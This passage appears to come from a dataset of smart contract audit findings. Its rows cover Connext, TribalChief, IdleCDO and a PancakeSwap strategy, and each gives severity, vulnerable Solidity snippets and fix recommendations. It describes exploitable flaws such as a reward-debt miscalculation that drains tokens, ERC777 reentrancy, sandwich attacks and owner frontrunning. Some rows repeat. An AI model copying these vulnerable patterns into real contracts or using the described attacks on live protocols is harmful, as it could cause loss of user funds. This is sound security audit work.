(txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n```\\n" +ProposedOwnable - two-step ownership transfer should be confirmed by the new owner,medium,"In order to avoid losing control of the contract, the two-step ownership transfer should be confirmed by the new owner's address instead of the current owner.\\n`acceptProposedOwner` is restricted to `onlyOwner` while ownership should be accepted by the newOwner\\n```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, ""#APO:030"");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n\\nmove `renounced()` to `ProposedOwnable` as this is where it logically belongs to\\n```\\nfunction renounced() public view override returns (bool) {\\n return owner() == address(0);\\n}\\n```\\n\\n`onlyOwner` can directly access state-var `_owner` instead of spending more gas on calling `owner()`\\n```\\nmodifier onlyOwner() {\\n require(owner() == msg.sender, ""#OO:029"");\\n \\_;\\n}\\n```\\n","Resolution\\nAll recommendations given below have been implemented. In addition to that, the privilege to manage assets and the privilege to manage routers can now be renounced separately.\\n`onlyOwner` can directly access `_owner` (gas optimization)\\nadd a method to explicitly renounce ownership of the contract\\nmove `TransactionManager.renounced()` to `ProposedOwnable` as this is where it logically belongs to\\nchange the access control for `acceptProposedOwner` from `onlyOwner` to `require(msg.sender == _proposed)` (new owner).",,"```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, ""#APO:030"");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n" +FulfillInterpreter - Wrong order of actions in fallback handling,low,"When a transaction with a `callTo` that is not `address(0)` is fulfilled, the funds to be withdrawn on the user's behalf are first transferred to the `FulfillInterpreter` instance that is associated with this `TransactionManager` instance. After that, `execute` is called on that interpreter instance, which, in turn, tries to make a call to `callTo`. If that call reverts or isn't made in the first place because `callTo` is not a contract address, the funds are transferred directly to the `receivingAddress` in the transaction (which becomes `fallbackAddress` in execute); otherwise, it's the called contract's task to transfer the previously approved funds from the interpreter.\\n```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nFor the fallback scenario, i.e., the call isn't executed or fails, the funds are first transferred to `fallbackAddress`, and the previously increased allowance is decreased after that. If the token supports it, the recipient of the direct transfer could try to exploit that the approval hasn't been revoked yet, so the logically correct order is to decrease the allowance first and transfer the funds later. However, it should be noted that the `FulfillInterpreter` should, at any point in time, only hold the funds that are supposed to be transferred as part of the current transaction; if there are any excess funds, these are leftovers from a previous failure to withdraw everything that could have been withdrawn, so these can be considered up for grabs. Hence, this is only a minor issue.","We recommend reversing the order of actions for the fallback case: Decrease the allowance first, and transfer later. Moreover, it would be better to increase the allowance only in case a call will actually be made, i.e., if `Address.isContract(callTo)` is `true`.\\nRemark\\nThis issue was already present in the original version of the code but was missed initially and only found during the re-audit.",,"```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n" +FulfillInterpreter - Missing check whether callTo address contains code,low,"Resolution\\nThis issue has been fixed.\\nThe receiver-side `prepare` checks whether the `callTo` address is either zero or a contract:\\n```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), ""#P:031"");\\n```\\n\\nHowever, as a contract may `selfdestruct` and the check is not repeated later, there is no guarantee that `callTo` still contains code when the call to this address (assuming it is non-zero) is actually executed in FulfillInterpreter.execute:\\n```\\n// Try to execute the callData\\n// the low level call will return `false` if its execution reverts\\n(bool success, bytes memory returnData) = callTo.call{value: isEther ? amount : 0}(callData);\\n\\nif (!success) {\\n // If it fails, transfer to fallback\\n Asset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isEther) {\\n Asset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nAs a result, if the contract at `callTo` self-destructs between `prepare` and `fulfill` (both on the receiving chain), `success` will be `true`, and the funds will probably be lost to the user.\\nA user could currently try to avoid this by checking that the contract still exists before calling `fulfill` on the receiving chain, but even then, they might get front-run by `selfdestruct`, and the situation is even worse with a relayer, so this provides no reliable protection.","Repeat the `Address.isContract` check on `callTo` before making the external call in `FulfillInterpreter.execute` and send the funds to the `fallbackAddress` if the result is `false`.\\nIt is, perhaps, debatable whether the check in `prepare` should be kept or removed. In principle, if the contract gets deployed between `prepare` and `fulfill`, that is still soon enough. However, if the `callTo` address doesn't have code at the time of `prepare`, this seems more likely to be a mistake than a “late deployment”. So unless there is a demonstrated use case for ���late deployments”, failing in `prepare` (even though it's receiver-side) might still be the better choice.\\nRemark\\nIt should be noted that an unsuccessful call, i.e., a revert, is the only behavior that is recognized by `FulfillInterpreter.execute` as failure. While it is prevalent to indicate failure by reverting, this doesn't have to be the case; a well-known example is an ERC20 token that indicates a failing transfer by returning `false`.\\nA user who wants to utilize this feature has to make sure that the called contract behaves accordingly; if that is not the case, an intermediary contract may be employed, which, for example, reverts for return value `false`.",,"```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), ""#P:031"");\\n```\\n" +TransactionManager - Adherence to EIP-712 Won't Fix,low,"`fulfill` function requires the user signature on a `transactionId`. While currently, the user SDK code is using a cryptographically secured pseudo-random function to generate the `transactionId`, it should not be counted upon and measures should be placed on the smart-contract level to ensure replay-attack protection.\\n```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory payload = SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\n","Consider adhering to EIP-712, or at least including `address(this), block.chainId` as part of the data signed by the user.",,"```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory payload = SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\n" +TransactionManager - Hard-coded chain ID might lead to problems after a chain split Pending,low,"The ID of the chain on which the contract is deployed is supplied as a constructor argument and stored as an `immutable` state variable:\\n```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n\\n```\\nconstructor(uint256 \\_chainId) {\\n chainId = \\_chainId;\\n interpreter = new FulfillInterpreter(address(this));\\n}\\n```\\n\\nHence, `chainId` can never change, and even after a chain split, both contracts would continue to use the same chain ID. That can have undesirable consequences. For example, a transaction that was prepared before the split could be fulfilled on both chains.","It would be better to query the chain ID directly from the chain via `block.chainId`. However, the development team informed us that they had encountered problems with this approach as some chains apparently are not implementing this correctly. They resorted to the method described above, a constructor-supplied, hard-coded value. For chains that do indeed not inform correctly about their chain ID, this is a reasonable solution. However, for the reasons outlined above, we still recommend querying the chain ID via `block.chainId` for chains that do support that — which should be the vast majority — and using the fallback mechanism only when necessary.",,"```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n" +TribalChief - A wrong user.rewardDebt value is calculated during the withdrawFromDeposit function call,high,"When withdrawing a single deposit, the reward debt is updated:\\n```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n\\nInstead of the `user.virtualAmount` in reward debt calculation, the `virtualAmountDelta` should be used. Because of that bug, the reward debt is much lower than it would be, which means that the reward itself will be much larger during the harvest. By making multiple deposit-withdraw actions, any user can steal all the Tribe tokens from the contract.",Use the `virtualAmountDelta` instead of the `user.virtualAmount`.,,```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n +TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missing,medium,"When a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n",Replace the `<` operator with `>` in `TribalChief` line 152.,,"```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n" +TribalChief - Unsafe down-castings,medium,"`TribalChief` consists of multiple unsafe down-casting operations. While the usage of types that can be packed into a single storage slot is more gas efficient, it may introduce hidden risks in some cases that can lead to loss of funds.\\nVarious instances in `TribalChief`, including (but not necessarily only) :\\n```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n\\n```\\npool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n```\\n\\n```\\nuserPoolData.rewardDebt += int128(virtualAmountDelta \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n","Given the time constraints of this audit engagement, we could not verify the implications and provide mitigation actions for each of the unsafe down-castings operations. However, we do recommend to either use numeric types that use 256 bits, or to add proper validation checks and handle these scenarios to avoid silent over/under-flow errors. Keep in mind that reverting these scenarios can sometimes lead to a denial of service, which might be harmful in some cases.",,```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n +TribalChief - Governor decrease of pool's allocation point should unlock depositors' funds,low,"When the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n",Make sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.,,"```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n" +TribalChief - new block reward retrospectively takes effect on pools that have not been updated recently,low,"When the governor updates the block reward `tribalChiefTribePerBlock` the new reward is applied for the outstanding duration of blocks in `updatePool`. This means, if a pool hasn't updated in a while (unlikely) the new block reward is retrospectively applied to the pending duration instead of starting from when the block reward changed.\\nrewards calculation\\n```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n\\nupdating the block reward\\n```\\n/// @notice Allows governor to change the amount of tribe per block\\n/// @param newBlockReward The new amount of tribe per block to distribute\\nfunction updateBlockReward(uint256 newBlockReward) external onlyGovernor {\\n tribalChiefTribePerBlock = newBlockReward;\\n emit NewTribePerBlock(newBlockReward);\\n}\\n```\\n",It is recommended to update pools before changing the block reward. Document and make users aware that the new reward is applied to the outstanding duration when calling `updatePool`.,,```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n +TribalChief - resetRewards should emit an event,low,The method `resetRewards` silently resets a pools tribe allocation.\\n```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. \\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\n,For transparency and to create an easily accessible audit trail of events consider emitting an event when resetting a pools allocation.,,```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. \\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\n +TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missing,medium,"When a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n",Replace the `<` operator with `>` in `TribalChief` line 152.,,"```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n" +TribalChief - Governor decrease of pool's allocation point should unlock depositors' funds,low,"When the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n",Make sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.,,"```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n" +IdleCDO._deposit() allows re-entrancy from hookable tokens.,medium,"The function `IdleCDO._deposit()` updates the system's internal accounting and mints shares to the caller, then transfers the deposited funds from the user. Some token standards, such as ERC777, allow a callback to the source of the funds before the balances are updated in `transferFrom()`. This callback could be used to re-enter the protocol while already holding the minted tranche tokens and at a point where the system accounting reflects a receipt of funds that has not yet occurred.\\nWhile an attacker could not interact with `IdleCDO.withdraw()` within this callback because of the `_checkSameTx()` restriction, they would be able to interact with the rest of the protocol.\\n```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\n",Move the `transferFrom()` action in `_deposit()` to immediately after `_updateCallerBlock()`.,,"```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\n" +IdleCDO.virtualPrice() and _updatePrices() yield different prices in a number of cases,medium,"The function `IdleCDO.virtualPrice()` is used to determine the current price of a tranche. Similarly, `IdleCDO._updatePrices()` is used to store the latest price of a tranche, as well as update other parts of the system accounting. There are a number of cases where the prices yielded by these two functions differ. While these are primarily corner cases that are not obviously exploitable in practice, potential violations of key accounting invariants should always be considered serious.\\nAdditionally, the use of two separate implementations of the same calculation suggest the potential for more undiscovered discrepancies, possibly of higher consequence.\\nAs an example, in `_updatePrices()` the precision loss from splitting the strategy returns favors BB tranche holders. In `virtualPrice()` both branches of the price calculation incur precision loss, favoring the `IdleCDO` contract itself.\\n`_updatePrices()`\\n```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n\\n`virtualPrice()`\\n```\\nif (\\_tranche == AATranche) {\\n // calculate gain for AA tranche\\n // trancheGain (AAGain) = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n trancheNAV = lastNAVAA + (gain \\* \\_trancheAPRSplitRatio / FULL\\_ALLOC);\\n} else {\\n // calculate gain for BB tranche\\n // trancheGain (BBGain) = gain \\* (FULL\\_ALLOC - trancheAPRSplitRatio) / FULL\\_ALLOC;\\n trancheNAV = lastNAVBB + (gain \\* (FULL\\_ALLOC - \\_trancheAPRSplitRatio) / FULL\\_ALLOC);\\n}\\n```\\n","Implement a single method that determines the current price for a tranche, and use this same implementation anywhere the price is needed.",,"```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n" +IdleCDO.harvest() allows price manipulation in certain circumstances,medium,"The function `IdleCDO.harvest()` uses Uniswap to liquidate rewards earned by the contract's strategy, then updates the relevant positions and internal accounting. This function can only be called by the contract `owner` or the designated `rebalancer` address, and it accepts an array which indicates the minimum buy amounts for the liquidation of each reward token.\\nThe purpose of permissioning this method and specifying minimum buy amounts is to prevent a sandwiching attack from manipulating the reserves of the Uniswap pools and forcing the `IdleCDO` contract to incur loss due to price slippage.\\nHowever, this does not effectively prevent price manipulation in all cases. Because the contract sells it's entire balance of redeemed rewards for the specified minimum buy amount, this approach does not enforce a minimum price for the executed trades. If the balance of `IdleCDO` or the amount of claimable rewards increases between the submission of the `harvest()` transaction and its execution, it may be possible to perform a profitable sandwiching attack while still satisfying the required minimum buy amounts.\\nThe viability of this exploit depends on how effectively an attacker can increase the amount of rewards tokens to be sold without incurring an offsetting loss. The strategy contracts used by `IdleCDO` are expected to vary widely in their implementations, and this manipulation could potentially be done either through direct interaction with the protocol or as part of a flashbots bundle containing a large position adjustment from an honest user.\\n```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), ""IDLE:!AUTH"");\\n```\\n\\n```\\n// approve the uniswap router to spend our reward\\nIERC20Detailed(rewardToken).safeIncreaseAllowance(address(\\_uniRouter), \\_currentBalance);\\n// do the uniswap trade\\n\\_uniRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(\\n \\_currentBalance,\\n \\_minAmount[i],\\n \\_path,\\n address(this),\\n block.timestamp + 1\\n);\\n```\\n",Update `IdleCDO.harvest()` to enforce a minimum price rather than a minimum buy amount. One method of doing so would be taking an additional array parameter indicating the amount of each token to sell in exchange for the respective buy amount.,,"```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), ""IDLE:!AUTH"");\\n```\\n" +Missing Sanity checks,low,The implementation of `initialize()` functions are missing some sanity checks. The proper checks are implemented in some of the setter functions but missing in some others.\\nMissing sanity check for `!= address(0)`\\n```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n\\n```\\nguardian = \\_owner;\\n```\\n\\n```\\naddress \\_currAAStaking = AAStaking;\\naddress \\_currBBStaking = BBStaking;\\n```\\n\\n```\\nidleCDO = \\_idleCDO;\\ntranche = \\_trancheToken;\\nrewards = \\_rewards;\\ngovernanceRecoveryFund = \\_governanceRecoveryFund;\\n```\\n,Resolution\\nThe development team has addressed this concern in commit `a1d5dac0ad5f562d4c75bff99e770d92bcc2a72f`. This change has not been reviewed by the audit team.\\nAdd sanity checks before assigning system variables.,,```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n +Frontrunning attacks by the owner,high,"There are few possible attack vectors by the owner:\\nAll strategies have fees from rewards. In addition to that, the PancakeSwap strategy has deposit fees. The default deposit fees equal zero; the maximum is limited to 5%:\\n```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n\\nWhen a user deposits tokens, expecting to have zero deposit fees, the `owner` can frontrun the deposit and increase fees to 5%. If the deposit size is big enough, that may be a significant amount of money. 2. In the `gulp` function, the reward tokens are exchanged for the reserve tokens on the exchange:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n {\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n uint256 \\_feeReward = \\_totalReward.mul(performanceFee) / 1e18;\\n Transfers.\\_pushFunds(rewardToken, collector, \\_feeReward);\\n }\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, 